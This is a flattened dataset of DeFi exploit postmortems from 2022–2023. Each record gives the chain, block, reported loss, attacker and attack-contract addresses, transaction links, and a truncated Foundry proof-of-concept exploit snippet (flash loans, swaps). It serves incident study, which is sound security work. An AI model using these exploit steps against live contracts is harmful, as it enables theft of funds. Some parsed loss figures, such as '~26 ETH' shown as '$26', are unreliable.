https://bscscan.com/address/0x1a7b15354e2f6564fcf6960c79542de251ce0dc9
https://bscscan.com/address/0x1694d7fabf3b28f11d65deeb9f60810daa26909a
null
https://explorer.phalcon.xyz/tx/bsc/0x191a34e6c0780c3d1ab5c9bc04948e231d742b7d88e0e4f85568d57fcdc03182
null
null
true
true
false
high
~$155K
unknown
function testExploit() public { deal(address(this), 0.02 ether); // Getting TPAD amount WBNBToTPAD(); // Jump to time when attack was happened vm.roll(33_260_391); uint256 startBalanceTPAD = TPAD.balanceOf(address(this)); // Approve all DDD tokens from original e...
true
~$155K
https://bscscan.com/address/0x1a7b15354e2f6564fcf6960c79542de251ce0dc9
https://bscscan.com/address/0x1694d7fabf3b28f11d65deeb9f60810daa26909a
https://explorer.phalcon.xyz/tx/bsc/0x191a34e6c0780c3d1ab5c9bc04948e231d742b7d88e0e4f85568d57fcdc03182
$155.0K
8
high
TrustPad Exploit (2023-11)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~20K USD$ // Attacker : https://etherscan.io/address/0x0ec330df28ae6106a774d0add3e540ea8d226e3b // Attack Contract : https://etherscan.io/address/0xf5836e292f716a7979f9b...
exploit_poc
MahaLend
2023-11
MahaLend_exp.sol
flash_loan
2d19775d4c8c6f80
2026-01-07T10:59:16.537112
postmortems
ethereum
18,544,604
~20K USD$
20,000
https://etherscan.io/address/0x0ec330df28ae6106a774d0add3e540ea8d226e3b
https://etherscan.io/address/0xf5836e292f716a7979f9bc5c2d3ed59913e07962
https://etherscan.io/address/0xfd11aba71c06061f446ade4eec057179f19c23c4
https://etherscan.io/tx/0x2881e839d4d562fad5356183e4f6a9d427ba6f475614ce8ef64dbfe557a4a2cc
null
https://twitter.com/Phalcon_xyz/status/1723223766350832071
true
true
true
medium
~20K USD$
flash-loan
false
~20K USD$
https://etherscan.io/address/0x0ec330df28ae6106a774d0add3e540ea8d226e3b
https://etherscan.io/address/0xf5836e292f716a7979f9bc5c2d3ed59913e07962
https://etherscan.io/address/0xfd11aba71c06061f446ade4eec057179f19c23c4
https://etherscan.io/tx/0x2881e839d4d562fad5356183e4f6a9d427ba6f475614ce8ef64dbfe557a4a2cc
https://twitter.com/Phalcon_xyz/status/1723223766350832071
$20.0K
7.49
medium
MahaLend Exploit (2023-11)
true
true
true
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~19K USD$ // Attacker - https://etherscan.io/address/0x2F746bC70f72aAF3340B8BbFd254fd91a3996218 // Attack contract - https://etherscan.io/address/0x85301f7b943fd132c8dbc33f8fd9d77109a84f28 // Attack Tx : http...
exploit_poc
TheNFTV2
2023-11
TheNFTV2_exp.sol
null
f8e269582f0e80e0
2026-01-07T10:59:16.537172
postmortems
ethereum
18,647,450
~19K USD$
19,000
null
null
null
https://etherscan.io/tx/0xd5b4d68432cbbd912130bbb5b93399031ddbb400d8f723c78050574de7533106
null
null
true
true
false
medium
~19K USD$
unknown
function test() public { address[] memory assets = new address[](1); assets[0] = address(WETH); uint256[] memory amounts = new uint256[](1); amounts[0] = 80_000 * 1e18; uint256[] memory modes = new uint256[](1); modes[0] = 0; emit log_named_decimal_uint("[Start] ...
true
~19K USD$
https://etherscan.io/tx/0xd5b4d68432cbbd912130bbb5b93399031ddbb400d8f723c78050574de7533106
$19.0K
6.72
medium
TheNFTV2 Exploit (2023-11)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; // @KeyInfo - Total Lost : ~$31K // Attacker : https://bscscan.com/address/0xb9bdc2537c6f4b587a5c81a67e7e3a4e6ddda189 // Attack Contract : https://bscscan.com/address/0xda148143379ae54e06d2429a5c80b19d4a9d6734 // Vulnerable C...
exploit_poc
ShibaToken
2023-11
ShibaToken_exp.sol
flash_loan
1192fa0d7242785d
2026-01-07T10:59:16.537221
postmortems
bsc
33,528,882
~$31K
31,000
https://bscscan.com/address/0xb9bdc2537c6f4b587a5c81a67e7e3a4e6ddda189
https://bscscan.com/address/0xda148143379ae54e06d2429a5c80b19d4a9d6734
https://bscscan.com/address/0x13b1f2e227ca6f8e08ac80368fd637f5084f10a5
https://explorer.phalcon.xyz/tx/bsc/0x75a26224da9faf37c2b3a4a634a096af7fec561f631a02c93e11e4a19d159477
null
null
true
false
true
medium
~$31K
flash-loan
function test() public { // vm.prank(0xb9bdc2537C6F4B587A5C81A67e7e3a4e6dDDa189, 0xb9bdc2537C6F4B587A5C81A67e7e3a4e6dDDa189); claim(20); }
true
~$31K
https://bscscan.com/address/0xb9bdc2537c6f4b587a5c81a67e7e3a4e6ddda189
https://bscscan.com/address/0xda148143379ae54e06d2429a5c80b19d4a9d6734
https://bscscan.com/address/0x13b1f2e227ca6f8e08ac80368fd637f5084f10a5
https://explorer.phalcon.xyz/tx/bsc/0x75a26224da9faf37c2b3a4a634a096af7fec561f631a02c93e11e4a19d159477
$31.0K
10
high
ShibaToken Exploit (2023-11)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~26 ETH // Attacker : https://etherscan.io/address/0x864e656c57a5a119f332c47326a35422294db5c9 // Attack Contract : https://etherscan.io/address/0x03e7b13bcd9b8383f403696...
exploit_poc
grok
2023-11
grok_exp.sol
null
049dc3944acc3676
2026-01-07T10:59:16.537288
postmortems
ethereum
18,538,679
~26 ETH
26
https://etherscan.io/address/0x864e656c57a5a119f332c47326a35422294db5c9
https://etherscan.io/address/0x03e7b13bcd9b8383f403696c1494845560607eca
null
https://explorer.phalcon.xyz/tx/eth/0x3e9bcee951cdad84805e0c82d2a1e982e71f2ec301a1cbd344c832e0acaee813?line=136
null
null
true
true
false
low
~26 ETH
unknown
function testExpolit() public { emit log_named_decimal_uint("attaker balance before attack:", weth.balanceOf(address(this)), weth.decimals()); wethpair.flash(address(this), 0, 30_000_000_000_000_000_000, new bytes(1)); emit log_named_decimal_uint("attaker balance after attack:", weth.balanceOf(a...
true
~26 ETH
https://etherscan.io/address/0x864e656c57a5a119f332c47326a35422294db5c9
https://etherscan.io/address/0x03e7b13bcd9b8383f403696c1494845560607eca
https://explorer.phalcon.xyz/tx/eth/0x3e9bcee951cdad84805e0c82d2a1e982e71f2ec301a1cbd344c832e0acaee813?line=136
$26
6.97
medium
grok Exploit (2023-11)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$2M // Attacker : https://etherscan.io/address/0x085bdff2c522e8637d4154039db8746bb8642bff // Attack Contract : https://etherscan.io/address/0x526e8e98356194b64eae4c2d44...
exploit_poc
OnyxProtocol
2023-11
OnyxProtocol_exp.sol
flash_loan
5a827c91e3f3ba47
2026-01-07T10:59:16.537346
postmortems
ethereum
18,476,512
~$2M
2,000,000
https://etherscan.io/address/0x085bdff2c522e8637d4154039db8746bb8642bff
https://etherscan.io/address/0x526e8e98356194b64eae4c2d443cc8aad367336f
null
https://explorer.phalcon.xyz/tx/eth/0xf7c21600452939a81b599017ee24ee0dfd92aaaccd0a55d02819a7658a6ef635
null
null
true
true
true
critical
~$2M
flash-loan
function testExploit() public { deal(address(this), 0 ether); deal(address(WETH), address(this), 0); emit log_named_decimal_uint("Attacker WETH balance before exploit", WETH.balanceOf(address(this)), 18); AaveV3.flashLoanSimple(address(this), address(WETH), 4000 * 1e18, bytes(""), 0); ...
true
~$2M
https://etherscan.io/address/0x085bdff2c522e8637d4154039db8746bb8642bff
https://etherscan.io/address/0x526e8e98356194b64eae4c2d443cc8aad367336f
https://explorer.phalcon.xyz/tx/eth/0xf7c21600452939a81b599017ee24ee0dfd92aaaccd0a55d02819a7658a6ef635
$2.00M
9
high
OnyxProtocol Exploit (2023-11)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$365K // Attacker : https://bscscan.com/address/0x69e068eb917115ed103278b812ec7541f021cea0 // Attack Contract : https://bscscan.com/address/0x3918e0d26b41134c006e8d2d7e...
exploit_poc
MEV_0x8c2d
2023-11
MEV_0x8c2d_exp.sol
null
f15973151ed78582
2026-01-07T10:59:16.537435
postmortems
bsc
33,435,892
~$365K
365,000
https://bscscan.com/address/0x69e068eb917115ed103278b812ec7541f021cea0
https://bscscan.com/address/0x3918e0d26b41134c006e8d2d7e3206a53b006108
null
https://explorer.phalcon.xyz/tx/bsc/0x3dcb26a1f49eb4d02ca29960b4833bfb2e83d7b5d9591aed1204168944c8c9b3
null
null
true
true
false
high
~$365K
unknown
function testExploit() public { deal(address(BUSDT), address(this), 0); bytes memory data = abi.encode(assetHarvestingContract, victimMevBot); WBNB_BUSDT.swap(BUSDT.balanceOf(victimMevBot), 0, address(this), data); }
true
~$365K
https://bscscan.com/address/0x69e068eb917115ed103278b812ec7541f021cea0
https://bscscan.com/address/0x3918e0d26b41134c006e8d2d7e3206a53b006108
https://explorer.phalcon.xyz/tx/bsc/0x3dcb26a1f49eb4d02ca29960b4833bfb2e83d7b5d9591aed1204168944c8c9b3
$365.0K
6.97
medium
MEV_0x8c2d Exploit (2023-11)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$2M // Attacker : https://etherscan.io/address/0x46d9b3dfbc163465ca9e306487cba60bc438f5a2 // Attack Contract : https://etherscan.io/address/0xeadf72fd4733665854c76926f4...
exploit_poc
bot
2023-11
bot_exp.sol
flash_loan
c0756aed3f045ab7
2026-01-07T10:59:16.537484
postmortems
ethereum
18,523,344
~$2M
2,000,000
https://etherscan.io/address/0x46d9b3dfbc163465ca9e306487cba60bc438f5a2
https://etherscan.io/address/0xeadf72fd4733665854c76926f4473389ff1b78b1
null
https://explorer.phalcon.xyz/tx/eth/0xbc08860cd0a08289c41033bdc84b2bb2b0c54a51ceae59620ed9904384287a38
null
null
true
true
true
critical
~$2M
flash-loan
function testExpolit() public { emit log_named_decimal_uint("attacker balance before attack", weth.balanceOf(address(this)), weth.decimals()); aave.flashLoanSimple(address(this), address(weth), 27_255_000_000_000_000_000_000, new bytes(1), 0); emit log_named_decimal_uint("attacker balance after...
true
~$2M
https://etherscan.io/address/0x46d9b3dfbc163465ca9e306487cba60bc438f5a2
https://etherscan.io/address/0xeadf72fd4733665854c76926f4473389ff1b78b1
https://explorer.phalcon.xyz/tx/eth/0xbc08860cd0a08289c41033bdc84b2bb2b0c54a51ceae59620ed9904384287a38
$2.00M
8.24
high
bot Exploit (2023-11)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~3.2 M USD$ // Attacker : https://etherscan.io/address/0xc1f2b71a502b551a65eee9c96318afdd5fd439fa // Attack Contract : https://etherscan.io/address/0x0a3340129816a86b62b...
exploit_poc
Raft
2023-11
Raft_exp.sol
flash_loan
3f5ed219e7f2d33c
2026-01-07T10:59:16.537538
postmortems
ethereum
18,543,485
~3.2 M USD$
3,200,000
https://etherscan.io/address/0xc1f2b71a502b551a65eee9c96318afdd5fd439fa
https://etherscan.io/address/0x0a3340129816a86b62b7eafd61427f743c315ef8
https://etherscan.io/address/0x9ab6b21cdf116f611110b048987e58894786c244
https://etherscan.io/tx/0xfeedbf51b4e2338e38171f6e19501327294ab1907ab44cfd2d7e7336c975ace7
null
https://twitter.com/BlockSecTeam/status/1723229393529835972
true
true
true
critical
~3.2 M USD$
flash-loan
false
~3.2 M USD$
https://etherscan.io/address/0xc1f2b71a502b551a65eee9c96318afdd5fd439fa
https://etherscan.io/address/0x0a3340129816a86b62b7eafd61427f743c315ef8
https://etherscan.io/address/0x9ab6b21cdf116f611110b048987e58894786c244
https://etherscan.io/tx/0xfeedbf51b4e2338e38171f6e19501327294ab1907ab44cfd2d7e7336c975ace7
https://twitter.com/BlockSecTeam/status/1723229393529835972
$3.20M
8
high
Raft Exploit (2023-11)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "./../basetest.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : Unclear // Attacker : https://bscscan.com/address/0xea75aec151f968b8de3789ca201a2a3a7faeefba // Attack Contract : https://bscscan.com/address/0x7b11ae85f73b7ee6aa84cc9143...
exploit_poc
XAI
2023-11
XAI_exp.sol
flash_loan
04bae15b2b011fe3
2026-01-07T10:59:16.537602
postmortems
bsc
null
Unclear
null
https://bscscan.com/address/0xea75aec151f968b8de3789ca201a2a3a7faeefba
https://bscscan.com/address/0x7b11ae85f73b7ee6aa84cc91430581bd952d9ffa
https://bscscan.com/address/0x570ce7b89c67200721406525e1848bca6ff5a6f3
https://app.blocksec.com/explorer/tx/bsc/0x2b251e456c434992b9ac7ec56dc166550c4cd7db3adefbf7eb3ab91cef55f9bf
null
https://x.com/MetaSec_xyz/status/1724683082064855455
true
true
true
medium
Unclear
flash-loan
function testExploit() public { emit log_named_decimal_uint( "Exploiter WBNB balance before attack", WBNB.balanceOf(address(this)), WBNB.decimals() ); XAI.approve(address(PancakeRouter), type(uint256).max); DPPOracle.flashLoan(WBNB.balanceOf(address(DPPOracle)), 0, address(t...
true
Unclear
https://bscscan.com/address/0xea75aec151f968b8de3789ca201a2a3a7faeefba
https://bscscan.com/address/0x7b11ae85f73b7ee6aa84cc91430581bd952d9ffa
https://bscscan.com/address/0x570ce7b89c67200721406525e1848bca6ff5a6f3
https://app.blocksec.com/explorer/tx/bsc/0x2b251e456c434992b9ac7ec56dc166550c4cd7db3adefbf7eb3ab91cef55f9bf
https://x.com/MetaSec_xyz/status/1724683082064855455
Unknown
7.67
medium
XAI Exploit (2023-11)
false
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/AnciliaInc/status/1599599614490877952 // @TX // https://bscscan.com/tx/0xac57c78881a7c00dfbac0563e21b5ae3a8e3f9d1b07198a27313722a166cc0a3 contract ContractTest...
exploit_poc
BBOX
2022-12
BBOX_exp.sol
flash_loan
24422e0327dfda85
2026-01-07T10:59:16.537642
postmortems
bsc
23,106,506
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { WBNB.approve(address(Router), type(uint256).max); BBOX.approve(address(Router), type(uint256).max); TransferBBOXHelp transferHelp = new TransferBBOXHelp(); // sell time limit contractAddress = address(transferHelp); flashLoanAmount = WBNB.balanceOf...
true
Unknown
4.26
low
BBOX Exploit (2022-12)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/SolidityFinance/status/1601684150456438784 // https://blog.lodestarfinance.io/post-mortem-summary-13f5fe0bb336 // @TX // https://arbiscan.io/tx/0xc523c6307b025e...
exploit_poc
Lodestar
2022-12
Lodestar_exp.sol
flash_loan
2e3df3ec79ac1117
2026-01-07T10:59:16.537693
postmortems
arbitrum
45,121,903
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
false
Unknown
4
low
Lodestar Exploit (2022-12)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; // @KeyInfo - Total Lost : ~1300 $USDC // Attacker : https://etherscan.io/address/0xb61e7f192a9ad5d11e2452f53d0ddf91b58239dc // Attack Contract : https://etherscan.io/address/0x0757d02596ef9840048def00eeb8e0f3862cc7ca // Vulnerable Contract : https://ethe...
exploit_poc
MEVbot_0x28d9
2022-12
MEVbot_0x28d9_exp.sol
flash_loan
6c648f81cb7f1754
2026-01-07T10:59:16.537770
postmortems
ethereum
16,157,843
~1300 $USDC
1,300
https://etherscan.io/address/0xb61e7f192a9ad5d11e2452f53d0ddf91b58239dc
https://etherscan.io/address/0x0757d02596ef9840048def00eeb8e0f3862cc7ca
https://etherscan.io/address/0x28d949fdfb5d9ea6b604fa6fee3d6548ea779f17
https://etherscan.io/tx/0x313d23bdd9277717e3088f32c976479c09d4b8a94d5d94deb835d157fd0850ce
null
null
true
false
true
low
~1300 $USDC
flash-loan
function testExploit() public { emit log_named_decimal_uint("Attacker USDC balance before attack", USDC.balanceOf(address(this)), 6); bytes memory data = abi.encode(address(this), 16_777_120 * 110 / 100, 0, 0); while (USDT.balanceOf(MevBot_addr) > 20 * 1e6) { DODO.flashLoan(0, 16_777...
true
~1300 $USDC
https://etherscan.io/address/0xb61e7f192a9ad5d11e2452f53d0ddf91b58239dc
https://etherscan.io/address/0x0757d02596ef9840048def00eeb8e0f3862cc7ca
https://etherscan.io/address/0x28d949fdfb5d9ea6b604fa6fee3d6548ea779f17
https://etherscan.io/tx/0x313d23bdd9277717e3088f32c976479c09d4b8a94d5d94deb835d157fd0850ce
$1.3K
7.95
medium
MEVbot_0x28d9 Exploit (2022-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$29k // Attacker : https://bscscan.com/address/0xE3104e645BC3f6fD821930a6a39EE509a0E87D3b // Attack Contract : // https://bscscan.com/address/0xe3293F89FD3B9336Ac2d514E...
exploit_poc
FPR
2022-12
FPR_exp.sol
null
6ee31ba08b38d827
2026-01-07T10:59:16.537816
postmortems
bsc
23,904,152
~$29k
29,000
https://bscscan.com/address/0xE3104e645BC3f6fD821930a6a39EE509a0E87D3b
null
null
null
null
null
true
true
false
medium
~$29k
unknown
function testExploit() public { FPR.approve(address(router), type(uint256).max); IERC20(address(pair)).approve(address(router), type(uint256).max); address[] memory path = new address[](2); path[0] = address(FPR); path[1] = address(USDT); for (uint256 i = 0; i < 3; i++) {...
true
~$29k
https://bscscan.com/address/0xE3104e645BC3f6fD821930a6a39EE509a0E87D3b
$29.0K
5.59
medium
FPR Exploit (2022-12)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BlockSecTeam/status/1600442137811689473 // https://twitter.com/peckshield/status/1600418002163625984 // @TX // https://bscscan.com/tx/0xca4d0d24aa448329b7d4eb81...
exploit_poc
AES
2022-12
AES_exp.sol
flash_loan
6b85507c22b0b218
2026-01-07T10:59:16.537861
postmortems
bsc
23,695,904
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { USDT.approve(address(Router), type(uint256).max); AES.approve(address(Router), type(uint256).max); DVM(dodo).flashLoan(0, 100_000 * 1e18, address(this), new bytes(1)); emit log_named_decimal_uint("[End] Attacker USDT balance after exploit", USDT.balanceOf...
true
Unknown
4.22
low
AES Exploit (2022-12)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BlockSecTeam/status/1606993118901198849 // https://twitter.com/peckshield/status/1606937055761952770 // @TX // https://etherscan.io/tx/0x9a97d85642f956ad7a6b852...
exploit_poc
Rubic
2022-12
Rubic_exp.sol
null
2d185816a38a1f51
2026-01-07T10:59:16.537911
postmortems
ethereum
16,260,580
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
false
Unknown
2.82
low
Rubic Exploit (2022-12)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BlockSecTeam/status/1602335214356660225 // @TX // https://bscscan.com/tx/0xea108fe94bfc9a71bb3e4dee4a1b0fd47572e6ad6aba8b2155ac44861be628ae interface ERCPorxy ...
exploit_poc
BGLD
2022-12
BGLD_exp.sol
flash_loan
2efb67880fced861
2026-01-07T10:59:16.537964
postmortems
bsc
23,844,529
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { oldBGLD.approve(address(Router), type(uint256).max); oldBGLD.approve(address(Proxy), type(uint256).max); newBGLD.approve(address(Router), type(uint256).max); DEBT.approve(address(Router), type(uint256).max); DVM(dodo).flashLoan(125 * 1e18, 0, addre...
true
Unknown
5.53
medium
BGLD Exploit (2022-12)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://quillaudits.medium.com/decoding-elastic-swaps-850k-exploit-quillaudits-9ceb7fcd8d1a // @Tx // https://etherscan.io/tx/0xb36486f032a450782d5d2fac118ea90a6d3b08cac3409d949c59...
exploit_poc
ElasticSwap
2022-12
ElasticSwap_exp.sol
null
d58046301c0e9d6b
2026-01-07T10:59:16.538021
postmortems
ethereum
23,563,709
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
function testExploit() public { TIC.approve(address(ELP), type(uint256).max); USDC_E.approve(address(ELP), type(uint256).max); ELP.approve(address(ELP), type(uint256).max); SPair.swap(51_112 * 1e18, 0, address(this), new bytes(1)); emit log_named_decimal_uint( "Attac...
true
Unknown
4.11
low
ElasticSwap Exploit (2022-12)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BlockSecTeam/status/1598262002010378241 // @TX // https://bscscan.com/tx/0xbcaecea2044101c80f186ce5327bec796cd9e054f0c240ddce93e2aead337370 first attack // http...
exploit_poc
APC
2022-12
APC_exp.sol
flash_loan
d4f5683479a0d7fb
2026-01-07T10:59:16.538071
postmortems
bsc
23,527,906
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { APC.approve(address(Router), type(uint256).max); APC.approve(address(transSwap), type(uint256).max); USDT.approve(address(Router), type(uint256).max); MUSD.approve(address(transSwap), type(uint256).max); DVM(dodo).flashLoan(0, 500_000 * 1e18, addre...
true
Unknown
4.44
low
APC Exploit (2022-12)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/peckshield/status/1598704809690877952 // @Address // https://snowtrace.io/address/0xfe2c4cb637830b3f1cdc626b99f31b1ff4842e2c interface JoeRouter { function...
exploit_poc
Overnight
2022-12
Overnight_exp.sol
flash_loan
f9fa717636540c2e
2026-01-07T10:59:16.538122
postmortems
avalanche
23,097,846
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public payable { amountBuy = 36_000_000_000; address[] memory path = new address[](2); path[0] = address(WAVAX); path[1] = address(USDC); Router.swapAVAXForExactTokens{value: 2830 ether}(amountBuy, path, address(this), block.timestamp); uint256 bef...
true
Unknown
6
medium
Overnight Exploit (2022-12)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BlockSecTeam/status/1602877048124735489 // @TX // https://bscscan.com/tx/0x7d2d8d2cda2d81529e0e0af90c4bfb39b6e74fa363c60b031d719dd9d153b012 // https://bscscan.c...
exploit_poc
Nmbplatform
2022-12
Nmbplatform_exp.sol
flash_loan
c205e4a256b1739e
2026-01-07T10:59:16.538203
postmortems
bsc
23,639,507
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { user1 = new User1(); user2 = new User2(); user3 = new User3(); NBU_WBNB.deposit{value: 20 ether}(); NBU_WBNB.transfer(address(user1), 16 ether); NBU_WBNB.transfer(address(user2), 2 ether); NBU_WBNB.transfer(address(user3), 2 ether);...
true
Unknown
6
medium
Nmbplatform Exploit (2022-12)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BeosinAlert/status/1601168659585454081 // @TX // https://bscscan.com/tx/0xf743dba906255cf6f75f8243ef8192f2a211aacf03df99322584686b5c445c23 // forge test --contr...
exploit_poc
NovaExchange
2022-12
NovaExchange_exp.sol
null
2fbb9ff931598a6b
2026-01-07T10:59:16.538268
postmortems
bsc
23,749,678
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
function testExploit() public { emit log_named_uint("Before exploit, NOVA balance of attacker:", novaContract.balanceOf(attacker)); cheats.prank(attacker); novaContract.rewardHolders(10_000_000_000_000_000_000_000_000_000); emit log_named_uint("After exploit, NOVA balance of attacker...
true
Unknown
3.16
low
NovaExchange Exploit (2022-12)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~1,450 US$ // Attacker : 0xb358BfD28b02c5e925b89aD8b0Eb35913D2d0805 // Attack Contract : 0x87bfd80c2a05ee98cfe188fd2a0e4d70187db137 // Vulnerable Contract : 0x2B806e6D78...
exploit_poc
DFS
2022-12
DFS_exp.sol
flash_loan
b4623b4d284e6465
2026-01-07T10:59:16.538312
postmortems
bsc
24,349,821
~1,450 US$
1
null
null
null
https://bscscan.com/tx/0xcddcb447d64c2ce4b3ac5ebaa6d42e26d3ed0ff3831c08923c53ea998f598a7c
null
null
true
true
true
low
~1,450 US$
flash-loan
function testExploit() public { Exploit exploit = new Exploit(); emit log_named_decimal_uint("[start] Attacker USDT Balance", IERC20(usdt).balanceOf(address(exploit)), 18); exploit.harvest(); emit log_named_decimal_uint("[End] Attacker USDT Balance", IERC20(usdt).balanceOf(address(exploi...
true
~1,450 US$
https://bscscan.com/tx/0xcddcb447d64c2ce4b3ac5ebaa6d42e26d3ed0ff3831c08923c53ea998f598a7c
$1
8.62
high
DFS Exploit (2022-12)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/peckshield/status/1601492605535399936 // @TX // https://bscscan.com/tx/0x1c5272ce35338c57c6b9ea710a09766a17bbf14b61438940c3072ed49bfec402 interface TIFIFinance...
exploit_poc
TIFI
2022-12
TIFI_exp.sol
null
8d530a446ff0dcc3
2026-01-07T10:59:16.538370
postmortems
bsc
23,778,726
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
function testExploit() public { WBNB.approve(address(TIFIRouter), type(uint256).max); BUSD.approve(address(TIFI), type(uint256).max); TIFIToken.approve(address(Router), type(uint256).max); Pair.swap(5 * 1e18, 500 * 1e18, address(this), new bytes(1)); emit log_named_decimal_uint(...
true
Unknown
3.37
low
TIFI Exploit (2022-12)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/PeckShieldAlert/status/1606276020276891650 // @TX // https://snowtrace.io/tx/0xc6fb8217e45870a93c25e2098f54f6e3b24674a3083c30664867de474bf0212d interface LSWUS...
exploit_poc
Defrost
2022-12
Defrost_exp.sol
flash_loan
201564bbb779fb58
2026-01-07T10:59:16.538409
postmortems
avalanche
24,003,940
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { flashLoanAmount = LSW.maxFlashLoan(address(USDC)); flashLoanFee = LSW.flashFee(address(USDC), flashLoanAmount); Pair.swap(0, flashLoanAmount + flashLoanFee, address(this), new bytes(1)); emit log_named_decimal_uint("[End] Attacker USDC balance after explo...
true
Unknown
4.19
low
Defrost Exploit (2022-12)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BeosinAlert/status/1601422462012469248 // @TX // https://snowtrace.io/tx/0xab39a17cdc200c812ecbb05aead6e6f574712170eafbd73736b053b168555680 interface MUBank { ...
exploit_poc
MUMUG
2022-12
MUMUG_exp.sol
flash_loan
a1129f1328d687b3
2026-01-07T10:59:16.538449
postmortems
avalanche
23,435,294
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { MU.approve(address(Router), type(uint256).max); MUG.approve(address(Router), type(uint256).max); USDC_e.approve(address(Router), type(uint256).max); USDC_e.approve(address(Bank), type(uint256).max); FlashLoanAmount = MU.balanceOf(address(Pair)) - 1...
true
Unknown
4.52
low
MUMUG Exploit (2022-12)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BlockSecTeam/status/1599991294947778560 // @TX // https://bscscan.com/tx/0xcc8fdb3c6af8bb9dfd87e913b743a13bbf138a143c27e0f387037887d28e3c7a contract ContractTe...
exploit_poc
RFB
2022-12
RFB_exp.sol
flash_loan
a35a52a850dbf8b9
2026-01-07T10:59:16.538489
postmortems
bsc
23,649,423
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public payable { RFB.approve(address(Router), type(uint256).max); WBNB.approve(address(Router), type(uint256).max); payable(address(uint160(0))).transfer(address(this).balance); DVM(dodo).flashLoan(20 * 1e18, 0, address(this), new bytes(1)); emit log_named...
true
Unknown
4.32
low
RFB Exploit (2022-12)
false
false
false
false
